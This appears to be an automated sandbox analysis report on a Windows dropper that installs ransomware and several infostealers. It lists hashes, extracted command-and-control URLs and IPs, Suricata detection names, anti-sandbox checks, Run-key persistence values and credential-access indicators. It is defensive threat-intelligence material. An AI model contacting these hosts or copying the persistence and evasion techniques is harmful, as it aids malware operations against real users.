Resubmissions
23-10-2021 15:52
211023-tbkbesdcfm 1022-10-2021 17:40
211022-v8trsscggr 1022-10-2021 15:55
211022-tc9ygacgan 1022-10-2021 14:38
211022-rz1bfabgb8 10Analysis
-
max time kernel
1801s -
max time network
1803s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
22-10-2021 17:40
Static task
static1
Behavioral task
behavioral1
Sample
Fri051e1e7444.exe
Resource
win10-en-20211014
General
-
Target
Fri051e1e7444.exe
-
Size
403KB
-
MD5
b4c503088928eef0e973a269f66a0dd2
-
SHA1
eb7f418b03aa9f21275de0393fcbf0d03b9719d5
-
SHA256
2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
-
SHA512
c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465
Malware Config
Extracted
C:\_readme.txt
djvu
https://we.tl/t-pk3SGFlmek
Extracted
vidar
41.5
903
https://mas.to/@xeroxxx
-
profile_id
903
Extracted
smokeloader
2020
http://gejajoo7.top/
http://sysaheu9.top/
Extracted
vidar
41.5
937
https://mas.to/@xeroxxx
-
profile_id
937
Extracted
redline
205.185.119.191:60857
Extracted
vidar
41.5
921
https://mas.to/@xeroxxx
-
profile_id
921
Extracted
raccoon
7c9b4504a63ed23664e38808e65948379b790395
-
url4cnc
http://telegka.top/capibar
http://telegin.top/capibar
https://t.me/capibar
Extracted
vidar
41.5
933
https://mas.to/@xeroxxx
-
profile_id
933
Extracted
djvu
http://rlrz.org/lancer
Signatures
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Process spawned unexpected child process 8 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1536 4956 schtasks.exe 107 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2192 4956 schtasks.exe 107 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2372 4956 schtasks.exe 107 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4052 4956 schtasks.exe 107 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2300 4956 schtasks.exe 107 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 896 4956 schtasks.exe 107 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4484 4956 schtasks.exe 107 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1828 4956 schtasks.exe 107 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 6 IoCs
Processes:
resource yara_rule behavioral1/memory/3436-186-0x0000000000400000-0x000000000043C000-memory.dmp family_redline behavioral1/memory/3436-188-0x00000000004368BE-mapping.dmp family_redline behavioral1/memory/996-203-0x0000000004AD0000-0x0000000004AEF000-memory.dmp family_redline behavioral1/memory/996-205-0x0000000004CF0000-0x0000000004D0D000-memory.dmp family_redline behavioral1/memory/3816-379-0x0000000000418AFE-mapping.dmp family_redline behavioral1/memory/3816-387-0x00000000053F0000-0x00000000059F6000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule behavioral1/files/0x000400000001ac21-251.dat family_socelars behavioral1/files/0x000400000001ac21-250.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes:
WerFault.exeWerFault.exedescription pid Process procid_target PID 4092 created 300 4092 WerFault.exe 148 PID 5960 created 5168 5960 WerFault.exe 193 -
suricata: ET MALWARE DCRAT Activity (GET)
suricata: ET MALWARE DCRAT Activity (GET)
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)
suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)
-
suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt
suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt
-
suricata: ET MALWARE Win32/Kelihos.F exe Download 2
suricata: ET MALWARE Win32/Kelihos.F exe Download 2
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 9 IoCs
Processes:
resource yara_rule behavioral1/memory/3876-124-0x0000000000400000-0x00000000008F1000-memory.dmp family_vidar behavioral1/memory/3876-123-0x0000000000E00000-0x0000000000ED6000-memory.dmp family_vidar behavioral1/memory/4668-158-0x0000000000400000-0x00000000008E3000-memory.dmp family_vidar behavioral1/memory/4668-157-0x0000000000ED0000-0x0000000000FA6000-memory.dmp family_vidar behavioral1/memory/1308-230-0x000000001C470000-0x000000001C548000-memory.dmp family_vidar behavioral1/files/0x000500000001ac08-243.dat family_vidar behavioral1/files/0x000500000001ac08-242.dat family_vidar behavioral1/memory/3056-469-0x0000000000DA0000-0x0000000000E76000-memory.dmp family_vidar behavioral1/memory/3056-473-0x0000000000400000-0x00000000008F1000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
DYbALA.exedescription ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe -
Executes dropped EXE 64 IoCs
Processes:
RqcBdtquQCGLaKIMXJSNd_ZL.exeRYVmga2gCYCILuVDQzIlK5af.exeOcB4jBzI70tFnRtK1WZB1Ocm.exeOcB4jBzI70tFnRtK1WZB1Ocm.exeUJrypcnxqC2LaOpY9q8RWOKu.exefgEDF5i3cgIOuMMvQaNZ1NCZ.exemt5IRqNxCvOuLR7GM_no0d2t.exexcW3TuSn3KSNmakFvG9gZQDx.exeaoWnOtt3BnvpIQ5LuYSMKmgs.exeaoWnOtt3BnvpIQ5LuYSMKmgs.tmpgXt9NtnPmMCRWaXBrQk8NfGb.exe_eKJw2OFuLijigALN0RShv0q.exexcW3TuSn3KSNmakFvG9gZQDx.execwvHAknFTAWGE2B0rxX1TkrF.executm3.exeDownFlSetup999.exeinst3.exebuild.exeFmIprFPSFzOTXlcTeprUC6YU.exen6LyyW6Y130rISPizyLnNBN_.exe9NDwiPlZEEhDGlkz9gl0UQAX.exeUl6PF7ORyqCzK3rFPRAWHREO.exeDYbALA.exe9NDwiPlZEEhDGlkz9gl0UQAX.exeexJBBJ57RhMwfX6V7rNCirtY.exe8pWB.eXEEF78.exeEF78.exeShellExperienceHost.exeNvFMn_zIjzcOhCOAYPNfV55o.exe1hlySlP9nisX71mJnP5mZ3Qa.exekMqKKP_wvgeIt3GAmkhy0_7l.exefoldershare.exeEWVAtHTOXdt0DAYRA3GEQBur.exeSHodecytolae.exeNvFMn_zIjzcOhCOAYPNfV55o.exeNvFMn_zIjzcOhCOAYPNfV55o.exeZuWzpISe9wfUgG8mQ9ORonH1.exeYLPxR1bFWYWLGzK0QEMH4Yaa.exeLzmwAqmV.exeBCleanSoft86.exeSoft1WW02.exesetup.exeinst2.exesetup.tmpaskinstall60.exe6.exeligr-game.execustomer7.exesetup_2.exesetup.exesfx.exesetup.tmp10.exeCalculator Installation.exesvchost.exeLzmwAqmV.exekPBhgOaGQk.exeLzmwAqmV.exepostback.exeFarLabUninstaller.exeNDP472-KB4054531-Web.exeSetup.exe142D.exepid Process 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 3876 RYVmga2gCYCILuVDQzIlK5af.exe 4368 OcB4jBzI70tFnRtK1WZB1Ocm.exe 2768 OcB4jBzI70tFnRtK1WZB1Ocm.exe 4984 UJrypcnxqC2LaOpY9q8RWOKu.exe 4236 fgEDF5i3cgIOuMMvQaNZ1NCZ.exe 4668 mt5IRqNxCvOuLR7GM_no0d2t.exe 3680 xcW3TuSn3KSNmakFvG9gZQDx.exe 772 aoWnOtt3BnvpIQ5LuYSMKmgs.exe 740 aoWnOtt3BnvpIQ5LuYSMKmgs.tmp 708 gXt9NtnPmMCRWaXBrQk8NfGb.exe 996 _eKJw2OFuLijigALN0RShv0q.exe 3436 xcW3TuSn3KSNmakFvG9gZQDx.exe 1308 cwvHAknFTAWGE2B0rxX1TkrF.exe 1740 cutm3.exe 1900 DownFlSetup999.exe 1576 inst3.exe 1276 build.exe 3824 FmIprFPSFzOTXlcTeprUC6YU.exe 3276 n6LyyW6Y130rISPizyLnNBN_.exe 3196 9NDwiPlZEEhDGlkz9gl0UQAX.exe 4488 Ul6PF7ORyqCzK3rFPRAWHREO.exe 4500 DYbALA.exe 3240 9NDwiPlZEEhDGlkz9gl0UQAX.exe 640 exJBBJ57RhMwfX6V7rNCirtY.exe 3932 8pWB.eXE 2496 EF78.exe 344 EF78.exe 4456 ShellExperienceHost.exe 4972 NvFMn_zIjzcOhCOAYPNfV55o.exe 2176 1hlySlP9nisX71mJnP5mZ3Qa.exe 4632 kMqKKP_wvgeIt3GAmkhy0_7l.exe 3932 foldershare.exe 300 EWVAtHTOXdt0DAYRA3GEQBur.exe 4836 SHodecytolae.exe 4256 NvFMn_zIjzcOhCOAYPNfV55o.exe 3816 NvFMn_zIjzcOhCOAYPNfV55o.exe 1060 ZuWzpISe9wfUgG8mQ9ORonH1.exe 592 YLPxR1bFWYWLGzK0QEMH4Yaa.exe 3580 LzmwAqmV.exe 4624 BCleanSoft86.exe 3056 Soft1WW02.exe 4648 setup.exe 1068 inst2.exe 200 setup.tmp 2072 askinstall60.exe 4644 6.exe 2976 ligr-game.exe 4940 customer7.exe 5168 setup_2.exe 5160 setup.exe 5228 sfx.exe 5276 setup.tmp 5300 10.exe 5364 Calculator Installation.exe 5768 svchost.exe 5932 LzmwAqmV.exe 4004 kPBhgOaGQk.exe 1752 LzmwAqmV.exe 2524 postback.exe 2568 FarLabUninstaller.exe 2876 NDP472-KB4054531-Web.exe 5232 Setup.exe 3688 142D.exe -
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 5 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
D725.exedescription ioc Process File opened for modification C:\Users\Admin\Pictures\ConvertTrace.tiff D725.exe File renamed C:\Users\Admin\Pictures\ConvertTrace.tiff => C:\Users\Admin\Pictures\ConvertTrace.tiff.zaps D725.exe File renamed C:\Users\Admin\Pictures\RestoreCopy.crw => C:\Users\Admin\Pictures\RestoreCopy.crw.zaps D725.exe File renamed C:\Users\Admin\Pictures\StepRedo.raw => C:\Users\Admin\Pictures\StepRedo.raw.zaps D725.exe File renamed C:\Users\Admin\Pictures\CompressStart.crw => C:\Users\Admin\Pictures\CompressStart.crw.zaps D725.exe -
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
ZuWzpISe9wfUgG8mQ9ORonH1.exeYLPxR1bFWYWLGzK0QEMH4Yaa.exesvchost.exekMqKKP_wvgeIt3GAmkhy0_7l.exe142D.exesvchost.exesvchost.exeexJBBJ57RhMwfX6V7rNCirtY.exeShellExperienceHost.exesvchost.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ZuWzpISe9wfUgG8mQ9ORonH1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion YLPxR1bFWYWLGzK0QEMH4Yaa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion kMqKKP_wvgeIt3GAmkhy0_7l.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 142D.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 142D.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion exJBBJ57RhMwfX6V7rNCirtY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion exJBBJ57RhMwfX6V7rNCirtY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ShellExperienceHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion kMqKKP_wvgeIt3GAmkhy0_7l.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ShellExperienceHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ZuWzpISe9wfUgG8mQ9ORonH1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion YLPxR1bFWYWLGzK0QEMH4Yaa.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Calculator.exeCalculator.exeCalculator.exeFri051e1e7444.exeSHodecytolae.exeFarLabUninstaller.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Fri051e1e7444.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation SHodecytolae.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation FarLabUninstaller.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
ShellExperienceHost.exeexJBBJ57RhMwfX6V7rNCirtY.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Wine ShellExperienceHost.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Wine exJBBJ57RhMwfX6V7rNCirtY.exe -
Loads dropped DLL 64 IoCs
Processes:
aoWnOtt3BnvpIQ5LuYSMKmgs.tmpFmIprFPSFzOTXlcTeprUC6YU.exeRYVmga2gCYCILuVDQzIlK5af.exemsiexec.exemt5IRqNxCvOuLR7GM_no0d2t.exebuild.exe9NDwiPlZEEhDGlkz9gl0UQAX.exesetup.tmpsetup.tmpCalculator Installation.exeSoft1WW02.exeSetup.exemsiexec.exe3E6B.exeregsvr32.exe727C.exe32E4.exemsiexec.exeregsvr32.exeLzmwAqmV.exepid Process 740 aoWnOtt3BnvpIQ5LuYSMKmgs.tmp 3824 FmIprFPSFzOTXlcTeprUC6YU.exe 3824 FmIprFPSFzOTXlcTeprUC6YU.exe 3824 FmIprFPSFzOTXlcTeprUC6YU.exe 3876 RYVmga2gCYCILuVDQzIlK5af.exe 3876 RYVmga2gCYCILuVDQzIlK5af.exe 1436 msiexec.exe 1436 msiexec.exe 4668 mt5IRqNxCvOuLR7GM_no0d2t.exe 4668 mt5IRqNxCvOuLR7GM_no0d2t.exe 1276 build.exe 1276 build.exe 3824 FmIprFPSFzOTXlcTeprUC6YU.exe 3240 9NDwiPlZEEhDGlkz9gl0UQAX.exe 3824 FmIprFPSFzOTXlcTeprUC6YU.exe 3240 9NDwiPlZEEhDGlkz9gl0UQAX.exe 3240 9NDwiPlZEEhDGlkz9gl0UQAX.exe 3240 9NDwiPlZEEhDGlkz9gl0UQAX.exe 3240 9NDwiPlZEEhDGlkz9gl0UQAX.exe 200 setup.tmp 5276 setup.tmp 5364 Calculator Installation.exe 5364 Calculator Installation.exe 5364 Calculator Installation.exe 5364 Calculator Installation.exe 3056 Soft1WW02.exe 3056 Soft1WW02.exe 5364 Calculator Installation.exe 5364 Calculator Installation.exe 5232 Setup.exe 5232 Setup.exe 4676 msiexec.exe 4676 msiexec.exe 5804 3E6B.exe 5412 regsvr32.exe 1528 727C.exe 4792 32E4.exe 4792 32E4.exe 5760 msiexec.exe 5760 msiexec.exe 1528 727C.exe 1528 727C.exe 1528 727C.exe 1528 727C.exe 5228 regsvr32.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 2 IoCs
Processes:
9NDwiPlZEEhDGlkz9gl0UQAX.exe727C.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts 9NDwiPlZEEhDGlkz9gl0UQAX.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts 727C.exe -
Accesses Microsoft Outlook profiles 1 TTPs 16 IoCs
Processes:
727C.exe9NDwiPlZEEhDGlkz9gl0UQAX.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook 727C.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook 727C.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook 9NDwiPlZEEhDGlkz9gl0UQAX.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook 9NDwiPlZEEhDGlkz9gl0UQAX.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook 9NDwiPlZEEhDGlkz9gl0UQAX.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook 727C.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook 9NDwiPlZEEhDGlkz9gl0UQAX.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook 9NDwiPlZEEhDGlkz9gl0UQAX.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook 727C.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook 727C.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook 9NDwiPlZEEhDGlkz9gl0UQAX.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook 9NDwiPlZEEhDGlkz9gl0UQAX.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook 727C.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook 727C.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook 727C.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook 9NDwiPlZEEhDGlkz9gl0UQAX.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 13 IoCs
Processes:
exJBBJ57RhMwfX6V7rNCirtY.exeD725.exe10A4.exesetup.exeDYbALA.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Recovery\\WindowsRE\\smss.exe\"" exJBBJ57RhMwfX6V7rNCirtY.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\_eKJw2OFuLijigALN0RShv0q = "\"C:\\Windows\\Tasks\\_eKJw2OFuLijigALN0RShv0q.exe\"" exJBBJ57RhMwfX6V7rNCirtY.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\9NDwiPlZEEhDGlkz9gl0UQAX = "\"C:\\Users\\Admin\\Pictures\\Adobe Films\\FmIprFPSFzOTXlcTeprUC6YU\\9NDwiPlZEEhDGlkz9gl0UQAX.exe\"" exJBBJ57RhMwfX6V7rNCirtY.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ShellExperienceHost = "\"C:\\Recovery\\WindowsRE\\ShellExperienceHost.exe\"" exJBBJ57RhMwfX6V7rNCirtY.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\6c23d4af-d2da-4874-8eaf-fee9dbb64da5\\D725.exe\" --AutoStart" D725.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\AbsoluteLLC = "\"C:\\Users\\Admin\\AppData\\Roaming\\LLCA\\AbsoluteLLC.exe\" -autorun" 10A4.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --loGQqfG2tg" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\RqcBdtquQCGLaKIMXJSNd_ZL = "\"C:\\odt\\RqcBdtquQCGLaKIMXJSNd_ZL.exe\"" exJBBJ57RhMwfX6V7rNCirtY.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\aoWnOtt3BnvpIQ5LuYSMKmgs.tmp = "\"C:\\Recovery\\WindowsRE\\aoWnOtt3BnvpIQ5LuYSMKmgs.tmp.exe\"" exJBBJ57RhMwfX6V7rNCirtY.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\aoWnOtt3BnvpIQ5LuYSMKmgs.tmp = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\is-KM2OK.tmp\\aoWnOtt3BnvpIQ5LuYSMKmgs.tmp.exe\"" exJBBJ57RhMwfX6V7rNCirtY.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ShellExperienceHost = "\"C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\AppxBlockMap\\ShellExperienceHost.exe\"" exJBBJ57RhMwfX6V7rNCirtY.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\FarLabUninstaller\\Fafeduceji.exe\"" DYbALA.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
svchost.exe142D.exesvchost.exesvchost.exesvchost.exekMqKKP_wvgeIt3GAmkhy0_7l.exeZuWzpISe9wfUgG8mQ9ORonH1.exeYLPxR1bFWYWLGzK0QEMH4Yaa.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 142D.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA kMqKKP_wvgeIt3GAmkhy0_7l.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ZuWzpISe9wfUgG8mQ9ORonH1.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA YLPxR1bFWYWLGzK0QEMH4Yaa.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 13 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 38 ipinfo.io 302 ip-api.com 453 api.2ip.ua 1267 api.2ip.ua 1718 api.2ip.ua 1719 api.2ip.ua 2146 api.2ip.ua 37 ipinfo.io 140 ip-api.com 252 ipinfo.io 253 ipinfo.io 440 api.2ip.ua 442 api.2ip.ua -
Drops file in System32 directory 8 IoCs
Processes:
explorer.exeexplorer.exedescription ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 explorer.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE explorer.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies explorer.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 explorer.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\t4[1] explorer.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat explorer.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\t4[1] explorer.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat explorer.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
Processes:
exJBBJ57RhMwfX6V7rNCirtY.exeShellExperienceHost.exekMqKKP_wvgeIt3GAmkhy0_7l.exeZuWzpISe9wfUgG8mQ9ORonH1.exe142D.exepid Process 640 exJBBJ57RhMwfX6V7rNCirtY.exe 4456 ShellExperienceHost.exe 4632 kMqKKP_wvgeIt3GAmkhy0_7l.exe 1060 ZuWzpISe9wfUgG8mQ9ORonH1.exe 3688 142D.exe -
Suspicious use of SetThreadContext 38 IoCs
Processes:
